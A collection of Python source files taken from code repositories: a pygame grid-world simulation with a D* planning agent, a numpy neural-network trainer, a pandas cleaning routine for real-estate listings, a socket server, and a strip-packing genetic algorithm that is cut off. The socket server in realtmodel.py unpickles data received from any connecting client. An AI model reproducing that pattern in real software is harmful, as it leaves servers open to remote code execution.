-> None:\n        self.grid = Grid(grid_size)\n\n    def fill_random_grid(self, agent_pos=None, target_pos=None, probability=0.3, seed=None) -> None:\n        np.random.seed(seed)\n        self.grid.fill_random_grid(probability)\n        if agent_pos is None:\n            self.grid.set_random_agent()\n        else:\n            self.grid.place_agent(agent_pos, force=True)\n        if target_pos is None:\n            self.grid.set_random_target()\n        else:\n            self.grid.place_target(target_pos, force=True)\n\n    def init_agent(self, agent_class, vision_func) -> None:\n        if self.grid is None:\n            print(\"No grid, can't initialize agent.\")\n            sys.exit()\n        self.agent = agent_class(vision_func=vision_func)\n        self.agent.set_target(self.grid.relative_target_pos())\n\n    def reset(self) -> None:\n        self.grid = None\n        self.agent = None\n\n    def run_sim(self, manual=False) -> None:\n        if self.render:\n            self.render_frame()\n            if manual:\n                started = False\n                while not started:\n                    for event in pygame.event.get():\n                        if event.type == pygame.QUIT: \n                            sys.exit()\n                        if event.type == pygame.MOUSEBUTTONDOWN: \n                            started = True\n\n        # do an initial scan\n        self.agent.update_map(self.grid.scan_cone(self.agent.cone_of_vision()))\n\n        finished = self.grid.agent_reached_target()\n        # search loop\n        while not finished: \n            # check for possible mismatches between agent map and grid\n            if self.agent.reached_target() != self.grid.agent_reached_target():\n                print(\"Mismatch between agent knowledge and grid status.\")\n                break\n            # check if agent path is still valid\n            if not self.agent.path_valid():\n                # try to plan a path\n                
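# replanning is lazy: it only happens when newly scanned obstacles invalidate the current path\n                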
if not self.agent.plan():\n print(\"Planning failed.\")\n break\n # try to take next step in path\n if not self.grid.agent_move(self.agent.next_action()):\n print(\"Environment does not allow the next action.\")\n break\n # if environment allows this action\n if not self.agent.take_next_action():\n print(\"Agent knowledge does not allow the next action.\")\n break\n # agent scan and update\n self.agent.update_map(self.grid.scan_cone(self.agent.cone_of_vision()))\n # check for reaching target\n finished = self.grid.agent_reached_target()\n\n # render\n if self.render:\n self.render_frame()\n if manual:\n started = False\n while not started:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN: \n started = True\n\n if not finished:\n print(\"Sim loop exited without agent reaching target.\")\n\n def draw_grid(self, grid_rect) -> None:\n grid_size = self.grid.size()\n\n # compute grid cell sizing\n # in pygame, first coordinate is horizontal\n horizontal_width = grid_rect.width // grid_size[1]\n vertical_width = grid_rect.height // grid_size[0]\n\n cell_width = min(horizontal_width, vertical_width)\n\n curr_corner = np.array([grid_rect.left, grid_rect.top])\n\n cells = [] # used to store all the drawn rectangles\n\n for i in range(grid_size[0]):\n cells.append([])\n for j in range(grid_size[1]):\n # set cell fill color base on cell status\n cell_status = self.grid.get_cell((i,j))\n if cell_status == GridStatus.AGENT:\n c = self.color_dict[\"blue\"]\n elif cell_status == GridStatus.PREV_AGENT:\n c = self.color_dict[\"turquoise\"]\n elif cell_status == GridStatus.TARGET:\n c = self.color_dict[\"green\"]\n elif cell_status == GridStatus.BOTH:\n c = self.color_dict[\"yellow\"]\n elif cell_status == GridStatus.OBSTACLE:\n c = self.color_dict[\"brown\"]\n else:\n c = self.color_dict[\"black\"]\n # set location\n rect = pygame.Rect(curr_corner[0], curr_corner[1], cell_width, cell_width)\n cells[-1].append(rect)\n # draw the cell\n pygame.draw.rect(self.screen, c, rect)\n # draw cell border\n pygame.draw.rect(self.screen, self.color_dict[\"gray\"], rect, 1)\n curr_corner += np.array([cell_width,0])\n curr_corner[0] = grid_rect.left\n curr_corner += np.array([0,cell_width])\n\n # draw the scan border\n corner = np.array([grid_rect.left, grid_rect.top])\n corner += np.array([self.grid.agent_pos[1]-1, self.grid.agent_pos[0]-1]) * cell_width\n scan_width = 3 * cell_width\n pygame.draw.rect(self.screen, self.color_dict[\"red\"], pygame.Rect(corner[0], corner[1], scan_width, scan_width), 2)\n\n # draw the agent's planned path\n path = self.agent.get_path_agent_frame()\n if path.shape[0] != 0:\n path = self.grid.translate_path_to_world_frame(path)\n for k in range(path.shape[0]-1):\n curr_coord = path[k]\n next_coord = path[k+1]\n if self.grid.in_bounds(curr_coord) and self.grid.in_bounds(next_coord):\n pygame.draw.line(self.screen, self.color_dict[\"purple\"], \n cells[curr_coord[0]][curr_coord[1]].center, cells[next_coord[0]][next_coord[1]].center, 3)\n else:\n break\n\n def draw_map(self, map_rect) -> None:\n map_size = self.agent.map_size()\n\n # compute grid cell sizing\n # in pygame, first coordinate is horizontal\n horizontal_width = map_rect.width // map_size[1]\n vertical_width = map_rect.height // map_size[0]\n\n cell_width = min(horizontal_width, vertical_width)\n\n curr_corner = np.array([map_rect.left, map_rect.top])\n\n cells = [] # used to store all the drawn rectangles\n\n for i in range(map_size[0]):\n cells.append([])\n 
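# one list of cell Rects per grid row; cells[i][j] is used below to anchor the path-line endpoints\n            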
for j in range(map_size[1]):\n # set cell fill color base on cell status\n cell_status = self.agent.get_cell((i,j))\n if cell_status == MapStatus.AGENT:\n c = self.color_dict[\"blue\"]\n elif cell_status == MapStatus.TARGET:\n c = self.color_dict[\"green\"]\n elif cell_status == MapStatus.BOTH:\n c = self.color_dict[\"yellow\"]\n elif cell_status == MapStatus.OBSTACLE:\n c = self.color_dict[\"brown\"]\n else:\n c = self.color_dict[\"black\"]\n # set location\n rect = pygame.Rect(curr_corner[0], curr_corner[1], cell_width, cell_width)\n cells[-1].append(rect)\n # draw the cell\n pygame.draw.rect(self.screen, c, rect)\n # draw cell border\n pygame.draw.rect(self.screen, self.color_dict[\"gray\"], rect, 1)\n curr_corner += np.array([cell_width,0])\n curr_corner[0] = map_rect.left\n curr_corner += np.array([0,cell_width])\n\n # draw the scan border\n corner = np.array([map_rect.left, map_rect.top])\n corner += np.array([self.agent.pos[1]-1, self.agent.pos[0]-1]) * cell_width\n scan_width = 3 * cell_width\n pygame.draw.rect(self.screen, self.color_dict[\"red\"], pygame.Rect(corner[0], corner[1], scan_width, scan_width), 2)\n\n # draw the agent's planned path\n path = self.agent.get_path()\n if path.shape[0] != 0:\n for k in range(path.shape[0]-1):\n curr_coord = path[k]\n next_coord = path[k+1]\n if self.agent.in_bounds(curr_coord) and self.agent.in_bounds(next_coord):\n pygame.draw.line(self.screen, self.color_dict[\"purple\"], \n cells[curr_coord[0]][curr_coord[1]].center, cells[next_coord[0]][next_coord[1]].center, 3)\n else:\n break\n\n def render_frame(self) -> None:\n if not self.render:\n return\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n\n # clear window\n self.screen.fill(self.color_dict[\"black\"])\n\n sub_figure_width = (self.window_size[0] - (self.render_offset.left + self.render_offset.right) - self.center_col_width) // 2\n sub_fugure_height = self.window_size[1] - (self.render_offset.top + self.render_offset.bottom)\n\n # draw the grid status\n grid_rect = pygame.Rect(self.render_offset.left, self.render_offset.top, \n sub_figure_width, \n sub_fugure_height)\n self.draw_grid(grid_rect)\n\n # grid status label text\n grid_label_rect = pygame.Rect(0, 0, (self.window_size[0]-self.center_col_width)//2, self.render_offset.top)\n self.screen.fill(self.color_dict[\"black\"], grid_label_rect)\n my_font = pygame.font.SysFont(\"Times New Roman\", 30)\n my_text = my_font.render(\"Grid Environment Status\", True, self.color_dict[\"white\"])\n my_rect = my_text.get_rect()\n width = my_rect.width\n height = my_rect.height\n self.screen.blit(my_text, (grid_label_rect.centerx - width//2, grid_label_rect.centery - height//2))\n\n # draw center column\n pygame.draw.rect(self.screen, self.color_dict[\"black\"], \n pygame.Rect((self.window_size[0]-self.center_col_width)//2, 0, self.center_col_width, self.window_size[1]))\n\n # draw the agent's map\n map_rect = pygame.Rect(sub_figure_width + self.center_col_width,\n self.render_offset.top, \n sub_figure_width, \n sub_fugure_height)\n self.draw_map(map_rect)\n\n # map status label text\n map_label_rect = pygame.Rect((self.window_size[0]-self.center_col_width)//2 + self.center_col_width, 0,\n (self.window_size[0]-self.center_col_width)//2, self.render_offset.top)\n self.screen.fill(self.color_dict[\"black\"], map_label_rect)\n my_font = pygame.font.SysFont(\"Times New Roman\", 30)\n my_text = my_font.render(\"Agent Map\", True, self.color_dict[\"white\"])\n my_rect = my_text.get_rect()\n width = my_rect.width\n 
height = my_rect.height\n self.screen.blit(my_text, (map_label_rect.centerx - width//2, map_label_rect.centery - height//2))\n\n pygame.display.flip()\n self.clock.tick(self.FPS)\n\n\nif __name__ == \"__main__\":\n sim = Simulation(render=True, window_size=(1050, 550), FPS=60, render_offset=Offset(50,0,0,0), center_col_width=50)\n map_width = map_height = 20\n sim.init_grid((map_height, map_width))\n sim.fill_random_grid(probability=0.4, seed=1)\n\n # sim.grid.set_obstacle((7,slice(0,17,None)))\n # sim.grid.set_obstacle((10,slice(0,17,None)))\n # sim.grid.set_obstacle((13,slice(0,17,None)))\n # sim.grid.place_agent((18,10),True)\n # sim.grid.place_target((3,10),True)\n\n sim.init_agent(agent_class=D_star_agent, vision_func=partial(scan_circular, radius=5))\n\n sim.render_frame()\n\n started = False\n while not started:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN: \n started = True\n\n t = time()\n sim.run_sim(manual=False)\n print(\"sim took:\", time() - t)\n\n sim.render_frame()\n\n print(\"Steps taken:\", sim.agent.steps_taken)\n print(\"Distance travelled:\", sim.agent.distance_travelled)\n print(\"Num expanded nodes:\", sim.agent.num_expanded_nodes)\n print(\"Max queue size:\", sim.agent.max_queue_size)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: \n sys.exit()\n","repo_name":"ben441318936/PlanningAndControl","sub_path":"GridWorld/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":14173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9947314724","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom process import get_data\nfrom predict import softmax\n\ndef y2indicator(y, K):\n N = len(y)\n ind = np.zeros((N, K))\n for i in range(N):\n ind[i, y[i]] = 1\n return ind\n\ndef forward(X, W1, b1, W2, b2):\n Z = np.tanh(X.dot(W1) + b1)\n return softmax(Z.dot(W2) + b2) , Z\n\ndef predict(P_Y_given_X):\n return np.argmax(P_Y_given_X, axis=1)\n\ndef classification_rate(Y, P):\n return np.mean(Y == P)\n\ndef cross_entropy(Y, pY):\n return -np.mean(Y * np.log(pY))\n\ndef main():\n\n Xtrain, Ytrain, Xtest, Ytest = get_data()\n\n D = Xtrain.shape[1] # num rows\n K = len(set(Ytrain)|set(Ytest)) # num unique outputs\n M = 5 # arbitrary\n\n Ytrain_ind = y2indicator(Ytrain, K)\n Ytest_ind = y2indicator(Ytest, K)\n\n # randomly initialize weights\n W1 = np.random.randn(D, M)\n b1 = np.zeros(M)\n W2 = np.random.randn(M, K)\n b2 = np.zeros(K)\n\n # training loop\n train_costs = []\n test_costs = []\n learning_rate = 0.001 # arbitrary \n epochs = 5000 # arbitrary\n\n for i in range(epochs):\n pYtrain, Ztrain = forward(Xtrain, W1, b1, W2, b2)\n pYtest, Ztest = forward(Xtest, W1, b1, W2, b2)\n\n ctrain = cross_entropy(Ytrain_ind, pYtrain)\n ctest = cross_entropy(Ytest_ind, pYtest)\n\n train_costs.append(ctrain)\n test_costs.append(ctest)\n\n # gradients (optional)\n gW2 = Ztrain.T.dot(pYtrain - Ytrain_ind)\n gb2 = (pYtrain - Ytrain_ind).sum(axis=0)\n dZ = (pYtrain - Ytrain_ind).dot(W2.T) * (1 - Ztrain * Ztrain) # hold variable\n gW1 = Xtrain.T.dot(dZ)\n gb1 = dZ.sum(axis=0)\n \n # updating weights\n W2 -= learning_rate * gW2\n b2 -= learning_rate * gb2\n W1 -= learning_rate * gW1\n b1 -= learning_rate * gb1\n\n if i % 1000 == 0:\n print(i, ctrain, ctest)\n\n pYtrain, _ = forward(Xtrain, W1, b1, W2, b2)\n pYtest, _ = forward(Xtest, W1, b1, W2, b2)\n\n acc_test = 
classification_rate(Ytest, predict(pYtest))\n    acc_train = classification_rate(Ytrain, predict(pYtrain))\n    print('Final train classification rate:', acc_train) \n    print('Final test classification rate:', acc_test) \n\n\n    plt.plot(train_costs, label = 'train cost')\n    plt.plot(test_costs, label = 'test cost')\n    plt.legend()\n    plt.show()\n\nif __name__ == '__main__':\n    main()","repo_name":"jacksauser/ML-and-Computer-Vision","sub_path":"neural_network_train.py","file_name":"neural_network_train.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12654100262","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom IPython.display import display\r\nimport openpyxl\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n#file_name = \"output_all_students_Train_v10.xlsx\"\r\n#df = pd.read_excel(file_name)\r\n#display(df.head())\r\n\r\ndef prepare_data(df):\r\n    df.columns = df.columns.str.strip() #clean up all unnecessary spaces\r\n    df.dropna(subset=['price'], inplace=True) #delete all rows without price\r\n    df.reset_index(drop=True, inplace=True) #reset index\r\n\r\n    #Replace values in the 'price' column\r\n    def convert_price(value):\r\n        numeric_value = re.search(r'(\\d[\\d,]*)', str(value))\r\n        if numeric_value:\r\n            numeric_value = numeric_value.group(1).replace(',', '')\r\n            return int(numeric_value)\r\n        else:\r\n            return None\r\n\r\n    df['price'] = df['price'].apply(convert_price)\r\n\r\n    #Clean Area values\r\n    def clean_area_value(value):\r\n        if isinstance(value, str):\r\n            cleaned_value = re.sub(r'[^0-9.]', '', value)  # Remove non-numeric characters except dot\r\n            try:\r\n                return float(cleaned_value)\r\n            except ValueError:\r\n                return None\r\n        elif isinstance(value, (int, float)):\r\n            return float(value)\r\n        else:\r\n            return None\r\n\r\n    df[\"Area\"] = df[\"Area\"].apply(clean_area_value)\r\n\r\n    #display(df['Area'].unique()) #(df)\r\n    #making columns price and area numeric\r\n    #df['Area'] = df['Area'].str.extract(r'(\\d+)').astype(float)\r\n    #df['price'] = pd.to_numeric(df['price'], errors='coerce').astype(float)\r\n\r\n\r\n    #Using RE to drop all punctuation marks\r\n    pattern = r'[^\\u0590-\\u05FF\\s\\d]'\r\n    columns_to_clean = ['Street', 'city_area'] #'description'\r\n    df[columns_to_clean] = df[columns_to_clean].replace(to_replace=pattern, value='', regex=True)\r\n    df[\"description\"] = df[\"description\"].str.replace(r\"[^A-Za-zא-ת0-9.\\\"']\", \" \", regex=True)\r\n\r\n\r\n    #df[\"description\"] = df[\"description\"].str.replace(r\"[^A-Za-zא-ת0-9.\\\"']\", \" \", regex=True)\r\n    #df.description.unique()\r\n\r\n    #Creating the new columns 'floor' and 'total_floors' and extracting the correct values to each column from the column 'floor_out_of'\r\n    df['floor'] = np.nan\r\n    df['total_floors'] = np.nan\r\n    df['floor_out_of'] = df['floor_out_of'].astype(str)\r\n    matches = df['floor_out_of'].str.extract(r'(\\d+).*?(\\d+)')\r\n    df['floor'] = matches[0].astype(float)\r\n    df['total_floors'] = matches[1].astype(float)\r\n    df.loc[df['type'].isin([\"קוטג'\", 'בית פרטי', 'מגרש', 'דו משפחתי', 'נחלה', \"קוטג' טורי\", 'דירת גן']), ['floor']] = 0\r\n    #df = df.drop('floor_out_of', axis=1)\r\n\r\n    #fill 0 where num_of_images is null\r\n    df['num_of_images'].fillna(0, inplace=True)\r\n\r\n    #replacing the values in entranceDate that are not dates with a built-in 
fixed date that we can identify later\r\n df['entranceDate'] = df['entranceDate'].replace('גמיש', '1996-09-13 00:00:00').replace('לא צויין', '1999-03-26 00:00:00').replace('מיידי', '2022-11-16 00:00:00')\r\n df['entranceDate'] = df['entranceDate'].apply(lambda x: '1996-09-13 00:00:00' if isinstance(x, str) and x.strip() == 'גמיש' else x)\r\n df['entranceDate'] = pd.to_datetime(df['entranceDate'])\r\n\r\n #making entranceDate categorial column\r\n above_year = 'above_year'\r\n months_6_12 = 'months_6_12'\r\n less_than_6_months = 'less_than_6_months'\r\n flexible = 'flexible'\r\n not_defined = 'not_defined'\r\n\r\n current_date = datetime.now()\r\n\r\n def replace_date(row):\r\n x = row['entranceDate']\r\n if x.year != 1996 and x.year != 1999 and x.year != 2022 and abs(current_date - x) > timedelta(days=365):\r\n return above_year\r\n elif x.year != 1996 and x.year != 1999 and x.year != 2022 and timedelta(days=182) <= abs(current_date - x) < timedelta(days=365):\r\n return months_6_12\r\n elif x.year != 1996 and x.year != 1999 and x.year != 2022 and current_date - x < timedelta(days=182):\r\n return less_than_6_months\r\n elif x == datetime(1996, 9, 13):\r\n return flexible\r\n elif x == datetime(1999, 3, 26): #or x == datetime(2022, 11, 16):\r\n return not_defined\r\n elif x.year == 2022:\r\n return less_than_6_months\r\n else:\r\n return x\r\n\r\n df['entranceDate'] = df.apply(replace_date, axis=1)\r\n\r\n #Cleaning room_number column\r\n replacement_mapping = {\r\n r'35': 3.5,\r\n r'5.5 חד׳': 5.5,\r\n r'4 חד׳': 4,\r\n r'2 חד׳': 2,\r\n r'3.5 חד׳': 3.5,\r\n r'5 חד׳': 5,\r\n r'3 חד׳': 3,\r\n r'6 חד׳': 6,\r\n r'6.5 חד׳': 6.5,\r\n r'4.5 חד׳': 4.5,\r\n r'2.5 חד׳': 2.5,\r\n r'8 חד׳': 8,\r\n r'7 חד׳': 7,\r\n r'-': np.nan,\r\n r'7.5 חד׳': 7.5,\r\n r'9.5 חד׳': 9.5,\r\n r\"4 חד'\": 4,\r\n r'10 חד׳': 10,\r\n r\"3 חד'\": 3,\r\n r\"5 חד'\": 5,\r\n r\"6 חד'\": 6,\r\n r\"^\\['6.5'\\]$\": 6.5,\r\n r\"^\\['3'\\]$\": 3,\r\n r\"^\\['4'\\]$\": 4,\r\n r\"^\\['4.5'\\]$\": 4.5,\r\n r\"^\\['5'\\]$\": 5,\r\n r\"^\\['7.5'\\]$\": 7.5,\r\n r\"^\\['7'\\]$\": 7,\r\n r\"^\\['6'\\]$\": 6\r\n }\r\n\r\n df['room_number'] = df['room_number'].replace(replacement_mapping, regex=True)\r\n df['room_number'] = df['room_number'].astype(float)\r\n\r\n\r\n ### Converting the columns 'hasElevator', 'hasParking', 'hasBars', 'hasStorage', 'hasAirCondition', 'hasBalcony', 'hasMamad' and 'handicapFriendly' to a boolean columns\r\n replace_values = [True, 'כן', 'יש', 'יש מעלית', 'yes', 'יש חניה', 'יש חנייה', 'יש סורגים', 'יש מחסן', 'יש מיזוג אויר', 'יש מיזוג אוויר', 'יש מרפסת', 'יש ממ\"ד', 'יש ממ\" ד', 'נגיש', 'נגיש לנכים', 'יש ממ״ד']\r\n\r\n df['hasElevator'] = df['hasElevator'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasParking'] = df['hasParking'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasBars'] = df['hasBars'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasStorage'] = df['hasStorage'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasAirCondition'] = df['hasAirCondition'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasBalcony'] = df['hasBalcony'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['hasMamad'] = df['hasMamad'].replace(replace_values, 1).astype(bool).astype(int)\r\n df['handicapFriendly'] = df['handicapFriendly'].replace(replace_values, 1).astype(bool).astype(int)\r\n\r\n replace_False_values = [False, 'לא', 'אין', 'אין מעלית', 'no', 'אין חניה', 'אין חנייה', 'אין סורגים', 'אין מחסן', 'אין מיזוג אויר', 'אין מיזוג אוויר', 'אין 
מרפסת', 'אין ממ\"ד', 'אין ממ\" ד', 'לא נגיש', 'לא נגיש לנכים', 'אין ממ״ד']\r\n\r\n df['hasElevator'] = df['hasElevator'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasParking'] = df['hasParking'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasBars'] = df['hasBars'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasStorage'] = df['hasStorage'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasAirCondition'] = df['hasAirCondition'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasBalcony'] = df['hasBalcony'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['hasMamad'] = df['hasMamad'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n df['handicapFriendly'] = df['handicapFriendly'].replace(replace_False_values, 0).astype(bool).astype(int)\r\n\r\n #Preapering condition column to be categorial\r\n df[\"condition\"] = df[\"condition\"].replace([\"לא צויין\",\"nan\", \"None\",\"False\"], 'not_defind')\r\n df['condition'] = df['condition'].replace({'משופץ': 'renovated' , 'שמור': 'maintained' , 'חדש': 'new' , 'ישן': 'old' , 'דורש שיפוץ': 'requires_renovation'})\r\n\r\n #Cleaning City\r\n df[\"City\"] = df[\"City\"].replace('נהרייה', 'נהריה')\r\n\r\n #cleaning street column\r\n df['Street'] = df['Street'].replace('None', np.nan)\r\n df['Street'] = df['Street'].str.replace(r\"\\['(.*?)'\\]\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"\\[\\'(.*?)\\'\\]\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"(\\w) '\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace(r\"' (\\w)\", r\"\\1\", regex=True)\r\n df['Street'] = df['Street'].str.replace('רמב ן', 'רמב\"ן')\r\n df['Street'] = df['Street'].str.replace('רחבת חי ל', 'רחבת חיל')\r\n df['Street'] = df['Street'].str.replace('פינס 5', 'פינס')\r\n df['Street'] = df['Street'].str.strip()\r\n df['Street'] = df['Street'].str.replace('עין נטפים\\n', 'עין נטפים') # Replace 'עין נטפים\\n' with 'עין נטפים'\r\n\r\n\r\n df['city_area'] = df['city_area'].str.strip()\r\n\r\n #clean publishedDays\r\n df['publishedDays'] = df['publishedDays'].replace('60+', '60')\r\n df['publishedDays'] = df['publishedDays'].replace('None', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('None ', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('-', np.nan)\r\n df['publishedDays'] = df['publishedDays'].replace('חדש!', '0')\r\n df['publishedDays'] = df['publishedDays'].replace('חדש', '0')\r\n df['publishedDays'] = df['publishedDays'].replace('Nan', np.nan)\r\n\r\n #Making furniture column categorial\r\n replace_dict = {\r\n 'חלקי': 'partial',\r\n 'מלא': 'full',\r\n 'אין': 'nothing',\r\n 'לא צויין': 'not_defined'\r\n }\r\n\r\n df['furniture'].replace(replace_dict, inplace=True)\r\n\r\n #Sorting the columns before selecting the featuers\r\n#passing_price_column = clean_df['price'] # Extract the 'price' column\r\n#clean_df = clean_df.drop(columns=['price']) # Drop the 'price' column from the DataFrame\r\n#clean_df['price'] = passing_price_column # Add the 'price' column back at the end\r\n#display(clean_df.head())\r\n\r\n#Creating vizulization\r\n#Compute the correlation matrix\r\n\r\n#+\r\n\r\n#numerical_columns = ['Area', 'room_number', 'floor', 'hasElevator', 'hasBars', 'hasAirCondition', 'handicapFriendly', 'hasParking', 'hasBalcony', 'hasMamad', 'hasStorage', 'price']\r\n\r\n#new_df = clean_df[numerical_columns].copy()\r\n\r\n# Compute the correlation matrix on the 
encoded DataFrame\r\n#correlation_matrix = new_df.corr()\r\n#correlation_matrix = clean_df.corr()\r\n#plt.figure(figsize=(16, 8))\r\n#sns.heatmap(correlation_matrix, annot=True, cmap='coolwarm')\r\n#plt.title('Correlation Matrix Heatmap')\r\n#plt.show()\r\n\r\n#Checking the predict for every numerical value\r\n# Select the numerical columns\r\n#columns = ['Area','room_number', 'floor', 'price', 'hasElevator', 'hasParking', 'hasBars', 'hasStorage', 'hasAirCondition', 'hasBalcony', 'hasMamad', 'handicapFriendly']\r\n\r\n# Calculate the Predictive Power Score for each binary column\r\n#feature_scores = {}\r\n#for column in columns:\r\n# score = pps.score(clean_df, column, 'price')\r\n# feature_scores[column] = score['ppscore']\r\n#sorted_features = sorted(feature_scores.items(), key=lambda x: x[1], reverse=True) # Sort the features by Predictive Power Score\r\n#print(\"Predictive Power Scores:\") # Print the features and their corresponding Predictive Power Scores\r\n#for feature, score in sorted_features:\r\n# print(f\"{feature}: {score}\")\r\n\r\n#Creating Chi-square test for categorical features\r\n#from scipy.stats import chi2_contingency\r\n#categorical_columns = ['City', 'type', 'city_area', 'condition', 'furniture', 'entranceDate']\r\n#selected_features = []\r\n#results = []\r\n#print(\"Chi-square Test Results:\")\r\n#for column in categorical_columns:\r\n# contingency_table = pd.crosstab(clean_df[column], clean_df['price'])\r\n# chi2, p_value, _, _ = chi2_contingency(contingency_table)\r\n# results.append({'Feature': column, 'Chi2': chi2, 'P-value': p_value})\r\n# # Set a significance level (e.g., 0.05) to determine feature importance\r\n# if p_value < 0.05:\r\n# selected_features.append(column)\r\n#print(\"Selected Categorical Features:\", selected_features)\r\n#print(pd.DataFrame(results))\r\n \r\n df.dropna(subset=['price'], inplace=True)\r\n df.dropna(subset=['Area'], inplace=True)\r\n df = df.drop_duplicates()\r\n columns_to_drop = ['Street', 'number_in_street', 'num_of_images', 'floor_out_of', 'hasElevator', 'hasBars', 'hasAirCondition', 'handicapFriendly', 'publishedDays', 'description', 'total_floors']\r\n df = df.drop(columns_to_drop, axis=1)\r\n df = df.replace('', np.nan).dropna()\r\n df = df.dropna()\r\n df.reset_index(drop=True, inplace=True)\r\n\r\n #file_out_name = \"clean_df.xlsx\"\r\n #df.to_excel(file_out_name, index=False)\r\n\r\n return df\r\n","repo_name":"DanielFrei316/Final_Task","sub_path":"madlan_data_prep.py","file_name":"madlan_data_prep.py","file_ext":"py","file_size_in_byte":13059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29004789086","text":"#!/usr/bin/python # This is server.py file\n\nimport json\nimport socket # Import socket module\nimport pickle\nimport pandas as pd\nimport numpy as np\n\nHEADERSIZE = 10\n\ndef nodeserv(transfdata):\n tfdata = transfdata.values.tolist()\n tfdatajson = json.dumps(tfdata)\n #print(tfdata)\n sn = socket.socket()\n hostn ='localhost'\n portn = 14564\n sn.bind((hostn, portn))\n print('nodeserv is running')\n sn.listen(5)\n print('after listening')\n while True:\n cn, addrn = sn.accept()\n print('Got connection from', addrn)\n #cn.send(bytes('Thank you for connecting','utf-8'))\n cn.send(bytes(tfdatajson, 'utf-8'))\n print(cn.recv(1024))\n cn.close()\n\ns = socket.socket() # Create a socket object\nhost = socket.gethostname() # Get local machine name\nport = 12345 # Reserve a port for your service.\ns.bind((host, port)) # Bind to the port\nprint('working 
now')\ns.listen(5) # Now wait for client connection.\nwhile True:\n    c, addr = s.accept() # Establish connection with client.\n    print('Got connection from', addr)\n    c.send(bytes('Thank you for connecting','utf-8'))\n\n    while True:\n        full_msg = b''\n        new_msg = True\n        while True:\n            msg = c.recv(4096)\n            print(\"receive working\")\n            if new_msg:\n                print(\"new msg len:\", msg[:HEADERSIZE])\n                msglen = int(msg[:HEADERSIZE])\n                new_msg = False\n            print(f\"full message length: {msglen}\")\n            full_msg += msg\n            print(len(full_msg))\n            if len(full_msg) -HEADERSIZE == msglen:\n                print(\"full msg recvd\")\n                #print(full_msg[HEADERSIZE:])\n                print(type(pickle.loads(full_msg[HEADERSIZE:])))\n                new_msg = True\n                full_msg = b\"\"\n\n    #print(pickle.loads(data))\n    #nodeserv(pickle.loads(data))\n\nc.close() # Close the connection\n","repo_name":"soundarya98/Fascia_nucleus","sub_path":"Fascia_pipeline/AWS/realtmodel.py","file_name":"realtmodel.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41526349042","text":"import numpy as np\r\nimport Plotter\r\n\r\n\r\nclass StripPackagingNotRotations:\r\n    W = 100\r\n    Pc = 0.65\r\n    Pm = 0.05\r\n    Np = 50\r\n    n = 20\r\n    anchos = []\r\n    alturas = []\r\n    show_figure = False\r\n\r\n    # Constructor\r\n    def __init__(self, n=10, gens=5000, anchos=None, alturas=None, max_width=100, seed=0, show_figure=True):\r\n        np.random.seed(seed)\r\n        self.W = 100\r\n        self.Pc = 0.65\r\n        self.Pm = 0.05\r\n        self.Np = 50\r\n        self.n = n\r\n        self.gens = gens\r\n        self.W = max_width\r\n        self.show_figure = show_figure\r\n\r\n        # Control for empty data\r\n        if alturas is None or anchos is None and n != 0:\r\n            self.anchos = np.random.randint(10, 50, n)\r\n            self.alturas = np.random.randint(10, 75, n)\r\n        else:\r\n            self.anchos = anchos\r\n            self.alturas = alturas\r\n\r\n    # Generate the population as permutations of n elements\r\n    def _generar_poblacion(self, n):\r\n        poblacion = np.zeros((self.Np, n))\r\n        for i in range(self.Np):\r\n            individuo = np.random.permutation(n)\r\n            poblacion[i] = individuo\r\n        return poblacion\r\n\r\n    # Fitness function that returns the total height of a rectangle layout\r\n    def _fitness(self, e):\r\n        ancho_acum = 0\r\n        altura_actual = 0\r\n        altura_total = 0\r\n\r\n        for i in e:\r\n            i = int(i)\r\n            if self.anchos[i] + ancho_acum <= self.W:\r\n                ancho_acum += self.anchos[i]\r\n                if self.alturas[i] > altura_actual:\r\n                    altura_actual = self.alturas[i]\r\n            else:\r\n                altura_total += altura_actual\r\n                ancho_acum = self.anchos[i]\r\n                altura_actual = self.alturas[i]\r\n\r\n        altura_total += altura_actual\r\n        return altura_total\r\n\r\n    # Select two individuals at random and keep the better one\r\n    def _seleccionar_padre(self, poblacion):\r\n        indice_padre1 = np.random.randint(0, self.Np - 1)\r\n        indice_padre2 = np.random.randint(0, self.Np - 1)\r\n        while indice_padre1 == indice_padre2:\r\n            indice_padre2 = np.random.randint(0, self.Np - 